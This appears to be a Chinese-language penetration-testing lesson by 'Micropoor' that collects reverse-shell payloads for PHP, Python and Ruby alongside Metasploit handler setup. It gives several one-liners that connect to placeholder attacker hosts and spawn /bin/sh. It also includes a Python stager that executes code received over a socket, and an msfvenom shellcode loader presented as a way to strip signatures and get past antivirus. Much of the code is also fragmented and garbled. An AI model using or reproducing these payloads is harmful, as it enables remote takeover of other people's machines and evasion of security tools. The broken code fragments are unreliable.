第十四课:基于第十课补充payload1
在实战中可能会遇到对 payload 的各种不同需求,并且可能遇到各种实际问题,如杀毒软件、防火墙拦截、特定端口通道、隧道等问题。这里我们根据第十课补充其中部分,其他内容后续补充。
这次主要补充了 PHP、Python、Ruby 三种语言的 payload。
ps:在线代码高亮:
http://tool.oschina.net/highlight
1、php-payload
msf
>
use exploit/multi/handler
msf exploit
(
handler
)
>
set
payload windows/meterpreter/reverse_tcp
payload
=>
windows/meterpreter/reverse_tcp
msf exploit
(
handler
)
>
set
LHOST
192.168
.1.107
LHOST
=>
192.168
.1.107
<?
php
error_reporting
(
0
)
;
$ip
=
'x.x.x.x'
;
$port
=
53
;
if
((
$f
=
'stream_socket_client'
)
&&
is_callable
(
$f
))
{
{
$port
}
"
)
;
$s_type
=
'stream'
;
}
if
(
!
$s
&&
(
$f
=
'fsockopen'
)
&&
is_callable
(
$f
))
{
$s
=
$f
(
$ip
,
$port
)
;
$s_
strlen
(
$b
))
;
break
;
case
'socket'
:
$b
.=
socket_read
(
$s
,
$len
-
strlen
(
$b
))
;
break
;
}
}
$GLOBALS
[
'msgsock'
]
=
$s
;
$GLOBALS
[
'msgsock_type'
]
=
$s_type
;
if
(
extension_loaded
(
's
>
<?php
$sock
=
fsockopen
(
"xx.xx.xx.xx"
,
xx
)
;
exec
(
"/bin/sh -i <&3 >&3 2>&3"
)
;
?>
2、python-payload
msf
>
use exploit/multi/handler
msf exploit
(
handler
)
>
set
payload windows/meterpreter/reverse_tcp
payload
=>
windows/meterpreter/reverse_tcp
msf exploit
(
handler
)
>
set
LHOST
192.168
.1.107
LHOST
=>
192.168
.1.107
import
socket
,
struct
,
time
for
x
in
range
(
10
):
try
:
s
=
socket
.
socket
(
2
,
socket
.
SOCK_STREAM
)
s
.
connect
((
'x.x.x.x'
,
xx
))
break
except
:
time
.
sleep
(
5
)
l
=
struct
.
unpack
(
'>I'
,
s
.
recv
(
4
))[
0
]
d
=
s
.
recv
(
l
)
while
len
(
d
)
<
l
:
d
+=
s
.
recv
(
l
-
len
(
d
))
exec
(
d
,{
's'
:
s
})
import
socket
,
subprocess
,
os;
s
=
socket
.
socket
(
socket
.
AF_INET
,
socket
.
SOCK_STREAM
)
;s
.
connect
((
"xx.xx.xx.xx"
,
xx
))
;
i"
])
;
import
socket
import
subprocess
s
=
socket
.
socket
()
s
.
connect
((
"xx.xx.xx.xx"
,
xx
))
while
1
:
p
=
subprocess
.
Popen
(
s
.
recv
(
1024
),
shell
=
True
,
stdout
=
subprocess
.
PIPE
,
stderr
=
subprocess
.
PIPE
,
stdin
=
subprocess
.
send
(
p
.
stdout
.
read
()
+
p
.
stderr
.
read
()
)
删除特征:
[email protected]
:~
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=8.8.8.8 LPORT=88 -f c | tr -d '"' | tr -d '\n'
from
ctypes
import
*
reverse_shell
=
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72
micropoorshell
=
create_string_buffer
(
reverse_shell
,
len
(
reverse_shell
))
shellcode
=
cast
(
micropoorshell
,
CFUNCTYPE
(
c_void_p
))
shellcode
()
3、ruby-payload
require
'socket'
;c
=
TCPSocket
.
new
(
"xx.xx.xx.xx"
,
x
)
;
$stdin
.
reopen
(
c
)
;
$stdout
.
reopen
(
c
)
;
$stderr
.
reopen
(
c
)
;
$stdi
(
IO
.
popen
(
l
,
"rb"
){
|
fd
|
fd
.
each_line
{
|
o
|
c
.
puts
(
o
.
strip
)
}})
rescue
nil
}
require
'socket'
;f
=
TCPSocket
.
open
(
"xx.xx.xx.xx"
,
xx
).
to_i;exec sprintf
(
"/bin/sh -i <&%d >&%d 2>&%d"
,
f
,
f
,
f
)
require
'socket'
;c
=
TCPSocket
.
new
(
"xx.xx.xx.xx"
,
"xx"
)
;
while
(
cmd
=
c
.
gets
)
;
IO
.
popen
(
cmd
,
"r"
){
|
io
|
c
.
print io
.
read
}
end
c
=
TCPSocket
.
new
(
"xx.xx.xx.xx"
,
"xx"
)
;
while
(
cmd
=
c
.
gets
)
;
IO
.
popen
(
cmd
,
"r"
){
\
|
io\
|
c
.
print
io
.
read
}
end
--By Micropoor